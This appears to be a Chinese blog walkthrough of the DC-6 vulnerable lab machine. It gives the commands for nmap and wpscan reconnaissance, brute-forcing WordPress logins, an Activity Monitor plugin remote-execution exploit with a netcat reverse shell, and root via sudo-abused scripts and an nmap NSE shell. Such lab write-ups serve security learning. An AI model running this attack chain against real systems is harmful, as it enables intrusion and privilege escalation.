渗透测试实战-DC-6-靶机入侵

154 阅读1分钟

​​​本文已参与「新人创作礼」活动,一起开启掘金创作之路。

信息收集

获取IP及目标主机信息

nmap -sP 192.168.1.2/24 -oN nmap.sP

nmap -A 192.168.1.169 -p- -oN  nmap.A

添加本地DNS解析

vim /etc/hosts

192.168.1.169 wordy

使用wpscan 扫描

wpscan --url wordy -e u

扫出了网站的登录后台

http://wordy/wp-login.php

以及4个用户名

爆破

作者给出了爆破使用的密码字典的提示信息,

创建密码字典

cd /usr/share/wordlists

cp rockyou.txt.gz rockyou.txt.gz.bak

gunzip rockyou.txt.gz rockyou.txt

cp /usr/share/wordlists/rockyou.txt /root/dc-6/passwd.dic

创建用户名字典

vim user.dic

暴力破解用户名密码

wpscan --url wordy -U user.dic -P passwd.dic

Username: mark, Password: helpdesk01

使用该账密,成功登录网站后台

反弹shell

查找activity monitor 插件是否存在漏洞

searchsploit activity monitor

存在远程执行漏洞可以反弹shell 到本地

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

修改该文件

vim 45274.html

python -m SimpleHTTPServer

当前目录下开启http 服务

本地开启nc 监听2333端口

nc -lvvp 2333

点击Submit request 连接

python -c 'import pty;pty.spawn("/bin/bash")'

反弹shell 成功,进入python 交互式

提权

进入到mark 的家目录下,在stuff 目录下发现things-to-do.txt 文件

得到graham 用户账密

sudo -l

可以发现 jens 用户在没有密码的情况下可以执行backups.sh 文件

我们在backups.sh 文件中添加/bin/bash 命令

echo "/bin/bash" >>backups.sh

sudo -u jens ./backups.sh

成功切换到jens 用户

sudo -l

发现nmap 命令可以在不需要root 用户密码密码的情况下使用

考虑使用nmap 脚本来提权

echo 'os.execute("/bin/sh")' > getShell.nse

sudo -u root nmap --script=getShell.nse

成功拿到flag